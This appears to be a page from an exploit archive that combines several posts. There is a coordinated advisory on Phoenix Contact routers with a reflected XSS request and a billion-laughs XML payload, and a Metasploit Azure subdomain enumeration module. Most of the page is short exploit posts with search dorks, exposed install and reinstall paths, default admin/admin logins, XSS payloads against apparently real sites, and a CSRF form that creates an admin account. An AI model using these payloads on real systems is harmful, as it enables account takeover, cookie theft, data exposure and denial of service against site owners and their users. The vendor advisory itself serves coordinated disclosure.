<pre><code>St. Pölten UAS<br />-------------------------------------------------------------------------------<br /> title| Multiple Vulnerabilities<br /> product| Phoenix Contact TC Cloud Client 1002-4G*,<br /> | TC Router 3002T-4G, Cloud Client 1101T-TX/TX<br /> vulnerable version| <2.07.2, <2.07.2, <2.06.10<br /> fixed version| 2.07.2, 2.07.2, 2.06.10<br /> CVE number| CVE-2023-3526, CVE-2023-3569<br /> impact| Medium<br /> homepage| https://www.phoenixcontact.com/<br /> found| 2023-05-04<br /> by| A. Resanovic, S. Stockinger, T. Etzenberger<br /> | This vulnerability was discovery during research at<br /> | St. Pölten UAS, supported and coordinated by CyberDanube.<br /> |<br /> | https://fhstp.ac.at | https://cyberdanube.com<br />-------------------------------------------------------------------------------<br /><br />Vendor description<br />-------------------------------------------------------------------------------<br />"At Phoenix Contact, our approach is innovative, sustainable, and based on<br />partnership. This applies to how we deal with employees as well as with our<br />customers. We are also conscious of our social and environmental responsibility<br />and we act accordingly. With the vision of the All Electric Society, we also<br />want to empower our customers to act more sustainably by enabling the<br />comprehensive electrification, networking, and automation of all sectors of the<br />economy and infrastructure with our products and solutions."<br /><br />Source: https://www.phoenixcontact.com/en-us/ueber-uns<br /><br /><br />Vulnerable versions<br />-------------------------------------------------------------------------------<br />TC Router 3002T-4G* / <2.0.2<br />TC Cloud Client 1002-4G* / <2.07.2<br />Cloud Client 1101T-TX/TX / <2.06.10<br /><br />Vulnerability overview<br />-------------------------------------------------------------------------------<br />1) Reflected Cross-Site Scripting (XSS) CVE-2023-3526<br />A reflected cross-site scripting vulnerability can be triggerd in the license<br />viewer of the device. This can be used to execute malicious code in the context<br />of a user's browser. Cookies may be also stoled via this way.<br /><br />2) Excessive Memory Consumption (Billion Laughts Attack) CVE-2023-3569<br />By abusing the configuration file upload functionality of the device, it is<br />possible to slow down all other processes.<br /><br />Proof of Concept<br />-------------------------------------------------------------------------------<br />1) Reflected Cross-Site Scripting (XSS) CVE-2023-3526<br />The reflected cross-site scripting vulnerability can be triggered by using the<br />following GET request:<br />https://$IP/cgi-bin/p/license?pkg=netsnmp&txt=15"><script>alert("document.cookie")</script><br /><br />2) Excessive Memory Consumption (Billion Laughts Attack) CVE-2023-3569<br />The following configuration file can be used to exploit the binary<br />"/usr/bin/xmlconfig", which supportes entity reference nodes:<br />===============================================================================<br /><?xml version="1.0"?><br /><!DOCTYPE lolz [<br /><!ENTITY lol "lol"><br /><!ELEMENT lolz (#PCDATA)><br /><!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;"><br /><!ENTITY lol2<br />"&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;"><br /><!ENTITY lol3<br />"&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;"><br /><!ENTITY lol4<br />"&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;"><br /><!ENTITY lol5<br />"&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;"><br /><!ENTITY lol6<br />"&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;"><br /><!ENTITY lol7<br />"&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;"><br /><!ENTITY lol8<br />"&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;"><br /><!ENTITY lol9<br />"&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;"><br />]><br /><lolz>&lol9;</lolz><br />===============================================================================<br /><br />The vulnerability was manually verified on an emulated device by using the<br />MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).<br /><br /><br />Solution<br />-------------------------------------------------------------------------------<br />Update to the latest available firmware version.<br /><br />Workaround<br />-------------------------------------------------------------------------------<br />None.<br /><br /><br />Recommendation<br />-------------------------------------------------------------------------------<br />Phoenix Contact customers are advised to upgrade the firware to the latest<br />available version.<br /><br /><br />Contact Timeline<br />-------------------------------------------------------------------------------<br />2023-05-16: Contacting vendor via psirt@phoenixcontact.com<br />2023-05-17: Vendor informed internal product team.<br />2023-05-18: Added responsible disclosure policy from St. Poelten UAS.<br />2023-05-19: Vendor needs more time to fix the issues.<br />2023-06-15: Vendor asked for an explaination of the issues as he cannot<br /> reproduce them; Sent screenshots and more PoCs to the vendor.<br /> Offered an MS Teams call to clarify the issues.<br />2023-06-16: Scheduled a call for 2023-06-19.<br />2023-06-19: Clarified issues and further timeline for the coordination.<br /> Vendor proposed to release the firmware on 2023-07-13.<br />2023-07-04: Contact stated that he has to shift the release after July. It<br /> will be released on 08.08.2023; Confirmed the date.<br />2023-07-13: Received CVE numbers from vendor.<br />2023-07-18: Received firmware versions from vendor.<br />2023-07-23:_Vendor released firmwares.<br />2023-08-08: Coordinated release of security advisory.<br /><br />Web: https://www.fhstp.ac.at/<br />Twitter: https://twitter.com/fh_stpoelten<br />Mail: mis at fhstp dot ac dot at<br /><br />EOF T. Weber / @2023<br /><br /><br /></code></pre>
<pre><code>*Background:*<br /><br />Microsoft makes use of a number of different domains and subdomains for<br />each of their Azure services. From SQL databases to SharePoint drives, each<br />service maps to its respective domain/subdomain, and with the proper<br />toolset, these can be identified through DNS enumeration to yield<br />information about the target domain's infrastructure.<br />enum_azuresubdomains.rb is a Metasploit module for enumerating public Azure<br />services by validating legitimate subdomains through various DNS record<br />queries. This cloud reconnaissance module rapidly identifies API services,<br />storage accounts, key vaults, databases, and more! Expedite your cloud<br />reconnaissance phases with enum_azuresubdomains.rb.<br /><br />*Code:*<br /><br />##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Auxiliary<br /> include Msf::Exploit::Remote::DNS::Enumeration<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Azure Subdomain Scanner and Enumerator',<br /> 'Description' => 'This module can be used for enumerating public<br />Azure services by locating valid subdomains through various DNS queries.',<br /> 'Author' => ['RoseSecurity <RoseSecurityConsulting[at]protonmail.me<br />>'],<br /> 'References' => ['<br />www.netspi.com/blog/technical/cloud-penetration-testing/enumerating-azure-services'<br />],<br /> 'License' => MSF_LICENSE<br /> )<br /> )<br /> register_options(<br /> [<br /> OptString.new('DOMAIN', [true, 'The target domain without TLD (Ex:<br />victim rather than victim.org)']),<br /> OptBool.new('PERMUTATIONS',<br /> [false,<br /> 'Prepend and append permutated keywords to domain',<br />false]),<br /> OptBool.new('ENUM_A', [true, 'Enumerate DNS A record', true]),<br /> OptBool.new('ENUM_CNAME', [true, 'Enumerate DNS CNAME record',<br />true]),<br /> OptBool.new('ENUM_MX', [true, 'Enumerate DNS MX record', true]),<br /> OptBool.new('ENUM_NS', [true, 'Enumerate DNS NS record', true]),<br /> OptBool.new('ENUM_SOA', [true, 'Enumerate DNS SOA record', true]),<br /> OptBool.new('ENUM_TXT', [true, 'Enumerate DNS TXT record', true])<br /> ]<br /> )<br /> end<br /><br /> def dns_enum(target_domains)<br /> target_domains.each do |domain|<br /> next unless dns_get_a(domain)<br /><br /> print_good("Discovered Target Domain: #{domain} \n")<br /> dns_get_a(domain) if datastore['ENUM_A']<br /> dns_get_cname(domain) if datastore['ENUM_CNAME']<br /> dns_get_ns(domain) if datastore['ENUM_NS']<br /> dns_get_mx(domain) if datastore['ENUM_MX']<br /> dns_get_soa(domain) if datastore['ENUM_SOA']<br /> dns_get_txt(domain) if datastore['ENUM_TXT']<br /> end<br /> end<br /><br /> def run<br /> # Array of subdomains to enumerate<br /> domain = datastore['DOMAIN']<br /> subdomains = [<br /> '.onmicrosoft.com',<br /> '.scm.azurewebsites.net',<br /> '.azurewebsites.net',<br /> '.p.azurewebsites.net',<br /> '.cloudapp.net',<br /> '.file.core.windows.net',<br /> '.blob.core.windows.net',<br /> '.queue.core.windows.net',<br /> '.table.core.windows.net',<br /> '.mail.protection.outlook.com',<br /> '.sharepoint.com',<br /> '.redis.cache.windows.net',<br /> '.documents.azure.com',<br /> '.database.windows.net',<br /> '.vault.azure.net',<br /> '.azureedge.net',<br /> '.search.windows.net',<br /> '.azure-api.net',<br /> '.azurecr.io'<br /> ]<br /><br /> # Array of keywords to prepend and append<br /> permutations = %w[<br /> root<br /> web<br /> api<br /> azure<br /> azure-logs<br /> data<br /> database<br /> data-private<br /> data-public<br /> dev<br /> development<br /> demo<br /> files<br /> filestorage<br /> internal<br /> keys<br /> logs<br /> private<br /> prod<br /> production<br /> public<br /> service<br /> services<br /> splunk<br /> sql<br /> staging<br /> storage<br /> storageaccount<br /> test<br /> useast<br /> useast2<br /> centralus<br /> northcentralus<br /> westcentralus<br /> westus<br /> westus2<br /> ]<br /><br /> # Create permutated array of keywords and target domain<br /> if datastore['PERMUTATIONS']<br /> permutated_domains = []<br /> permutations.each do |keywords|<br /> permutated_domains.append("#{domain}-#{keywords}")<br /> permutated_domains.append("#{keywords}-#{domain}")<br /> end<br /> # Permutated and Normal list of subdomains<br /> target_domains = []<br /> subdomains.each do |tld|<br /> target_domains.append(domain + tld)<br /> permutated_domains.each do |_subdomain|<br /> target_domains.append(domain + tld)<br /> end<br /> end<br /> # Query DNS records of permutated and normal target subdomains<br /> else<br /> # Query DNS records of normal target subdomains<br /> target_domains = []<br /> subdomains.each do |tld|<br /> target_domains.append(domain + tld)<br /> end<br /> end<br /> dns_enum(target_domains)<br /> end<br />end<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : BookingWizz v6.0.1 sensitive information disclosure Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit) | <br />| # Vendor : https://codecanyon.net/item/booking-system/87919?s_rank=9 | <br />| # Dork : "BookingWizz v6.0" |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] The error is from the developer, as it does not warn you to delete the installation file after completion, or it is deleted automatically.<br /><br />[+] When you add install file they show you the real user and pass for admin panel.<br /><br />[+] Use Payload : /install.php<br /><br />[+] https://127.0.0.1therazorsedgebarberscom/tiff/install.php<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : E-commerce Growisei CMS v2.0 insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit) | <br />| # Vendor : https://www.growiseit.com/ | <br />| # Dork : Growise InfoTech. All Rights Reserved. |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] use payload : user & pass = admin<br /><br />[+] Panel : https://127.0.0.1/khakipacketcom/admin/dashboard<br /><br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : dbcinfotech CMS v2.0 Reinstall Script Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit) |<br />| # Vendor : https://www.themeslide.com/whizclassified-classifieds-cms/ |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Reinstall the site manager settings including resetting a new password.<br /><br /> because after the first installation, The setup file was not deleted automatically or by the website owner.<br /><br /> the installation file repeats the installation process.<br /><br />[+] use payload : /index.php/en/install/accountsetup<br /><br />[+] http://127.0.0.1/aphroditepaphiascom/index.php/en/install/accountsetup<br /><br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Education Time Indonesian School CRM v 1.7 Xss Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit) |<br />| # Vendor : http://p30vel.ir | <br />| # Dork : "media.php?module=detailberita&id=" |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine .<br /><br />[+] use payload : /unit/spi/media.php?id=173%27%22()%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt(/ramadan%20mubark/)%3C/ScRiPt%3E&module=detailberita/unit/spi/media.php?id=173%27%22()%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt(908942)%3C/ScRiPt%3E&module=detailberita<br /><br />[+] http://wwumpalangkarayaacid//unit/spi/media.php?id=173%27%22()%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt(/ramadan%20mubark/)%3C/ScRiPt%3E&module=detailberita/unit/spi/media.php?id=173%27%22()%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt(908942)%3C/ScRiPt%3E&module=detailberita<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Eden CMS v1.02 Xss Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit) |<br />| # Vendor : https://edendesign.be/fr/ | <br />| # Dork : intext:"Website by Eden Design" |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine .<br /><br />[+] use payload : artist.php?lang_id=1%27%22()%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt(/indoushka/)%3C/ScRiPt%3E&post_id=352<br /><br />[+] http://www/miniartextilit/artist.php?lang_id=1%27%22()%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt(/indoushka/)%3C/ScRiPt%3E&post_id=352<br /> <br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Ecommerce Responsive v1.2 Insecure Direct Object Reference Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 62.0.3 (32-bit) |<br />| # Vendor : https://codecanyon.net/item/ecommerce-responsive-ecommerce-business-management-script/21413994 | <br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine .<br /><br />[+] Any visitor can export and download a subscriber list .<br /><br />[+] use payload : /admin/subscriber-csv.php<br /><br />[+] https://www/demoslycom/xicia/cc/ecommerce/admin/subscriber-csv.php<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : E-Biz CMS v2.0 CSRF Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit) | <br />| # Vendor : https://softech.pk/ | <br />| # Dork : Copyright © 2019, Designed By SOFTECH |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] The following html code create a new admin .<br /><br />[+] Go to the line 17.<br /><br />[+] Set the target site link Save changes and apply . <br /><br />[+] infected file : /add_user.php.<br /><br />[+] http://127.0.0.1/q7.3/softpanel/add_user.php.<br /><br />[+] save code as poc.html .<br /><br /> <h1>Add User</h1><br /> </div><br /> <!-- #contentHeader --><br /> <div class="site"><br /> <div class="container"><br /> <div class="grid-16"><br /> <br /> <div class="widget" ><br /> <div class="widget-header"> <span class="icon-wrench"></span><br /> <h3>Add User </h3><br /> </div><br /> <!-- .widget-header --><br /> <div class="widget-content"><br /> <!-- .field-group --><br /> <!-- .field-group --><br /> <!-- .field-group --><br /> <form action="http://aosccom/softpanel/add_user.php" method="post" enctype="multipart/form-data" name="" class="form uniformForm validateForm"><br /> <table width="650" border="0" align="center" cellpadding="0" cellspacing="0"><br /> <tr><br /> <td width="527" align="left"><strong>Name : </strong></td><br /> </tr><br /> <tr><br /> <td><input name="name" value="" class="validate[required]" type="text" id="name" size="50"></td><br /> </tr><br /> <tr><br /> <td><strong>Email :</strong> </td><br /> </tr><br /> <tr><br /> <td><span class="field"><br /> <input name="email" type="text" id="date" class="validate[required,custom[email]" size="50" /><br /> </span></td><br /> </tr><br /> <tr><br /> <td><strong>Password :</strong></td><br /> </tr><br /> <tr><br /> <td><div class="field"><br /> <input name="password" type="text" id="date_English" class="validate[required]" size="50" /> <br /> </div> </td><br /> </tr><br /> <tr><br /> <td><strong>Access : </strong></td><br /> </tr><br /> <tr><br /> <td><select name="type" id="type" ><br /> <option value="user" selected="selected">User</option><br /> <option value="admin">Admin</option><br /> </select> </td><br /> </tr><br /> <tr id="link"><br /> <td><table width="100%" border="0" cellspacing="0" cellpadding="0"><br /> <tr><br /> <td height="30"><strong id="">Privileges:</strong></td><br /> </tr><br /> <tr><br /> <td align="center" valign="middle"><table width="400" border="0" align="center" cellpadding="0" cellspacing="0"><br /> <br /> <tr><br /> <td width="54%" height="25" align="left"><table width="150" border="0" cellspacing="0" cellpadding="0"><br /> <tr><br /> <td height="25"><label for="label">Company News</label></td><br /> <td width="10"><input type="checkbox" id="new" name="news" value="Y" onClick="news.value=(this.checked)?'Y':'N'"></td><br /> </tr> <tr><br /> <td height="25">Home Banners</td><br /> <td><input type="checkbox" id="ban" name="banners" value="Y" onClick="banners.value=(this.checked)?'Y':'N'" ></td><br /> </tr> <tr><br /> <td height="25">Gallery</td><br /> <td><input type="checkbox" id="gal" name="gallery" value="Y" onClick="gallery.value=(this.checked)?'Y':'N'"></td><br /> </tr> <tr><br /> <td height="25"><label for="sim">Simple Gallery</label></td><br /> <td><input type="checkbox" id="gallery" name="simple_gallery" value="Y" onClick="simple_gallery.value=(this.checked)?'Y':'N'"></td><br /> </tr> <tr><br /> <td height="25">Pages</td><br /> <td><input name="pages" type="checkbox" id="pages"onClick="pages.value=(this.checked)?'Y':'N'" value="checkbox" checked></td><br /> </tr> <tr><br /> <td height="25">Newsletter</td><br /> <td><input name="newsletter" type="checkbox" id="newsletter"onClick="newsletter.value=(this.checked)?'Y':'N'" value="checkbox" checked></td><br /> </tr> <tr><br /> <td height="25">Categories</td><br /> <td><input name="categories" type="checkbox" id="categories" onClick="categories.value=(this.checked)?'Y':'N'" value="checkbox" checked></td><br /> </tr> </table> </td><br /> </tr><br /> <br /> </table> </td><br /> </tr><br /> </table></td><br /> </tr><br /> <tr><br /> <td></td><br /> </tr><br /> <tr><br /> <td></td><br /> </tr><br /> <br /> <br /> <tr><br /> <td>&nbsp;</td><br /> </tr><br /> </table><br /> </td><br /> </tr><br /> <tr><br /> <td></td><br /> </tr><br /> <tr><br /> <td>&nbsp;</td><br /> </tr><br /> <tr><br /> <td></td><br /> </tr><br /> <tr><br /> <td> </td><br /> </tr><br /> <tr><br /> <td>&nbsp;</td><br /> </tr><br /> <tr><br /> <td><button name="save"class="btn btn-primary"><span class="icon-move-alt2"></span>Save</button><br /> <br /><button type="reset" class="btn btn-primary"><span class="icon-move-horizontal-alt2"></span>Cancel</button></td><br /> </tr><br /> </table><br /> </form><br /> </div><br /><br />Greetings to :=================================================================<br />jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |<br />===============================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : EasyPX CMS V06.02.04 XSS Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit) |<br />| # Vendor : http://www.domphp.com/ |<br />| # Dork : Site fonctionnant sous Easy PX 41 CMOS 06.02.04 © 2004 - 2006 Freeware |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] This vulnerability affects : /tst/index.php<br /><br /> URL encoded POST input choixgalerie was set to 1" onmouseover=prompt(951655) bad="<br /> The input is reflected inside a tag parameter between double quotes.<br /> URL encoded POST input pg was set to system/fnc/readpg.php'"()&%<ScRiPt >prompt(940614)</ScRiPt><br /> URL encoded POST input pg was set to modules/login/inscription.php'"()&%<ScRiPt >prompt(904457)</ScRiPt><br /> URL encoded POST input pg_id was set to http://www.generation-libre.com/index2.php%3foption%3dcom_rss'"()&%<ScRiPt >prompt(920742)</ScRiPt><br /> URL encoded POST input pg_title was set to RSS'"()&%<ScRiPt >prompt(963497)</ScRiPt><br /><br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
Archives
Categories
- All Exploits 4105
- Remote Code Execution
- SQL Injection
- Command Injection
- Local File Inclusion
- Cross Site Scripting
- Privilege Escalation
- Denial Of Service
- Authentication Bypass
- Buffer Overflow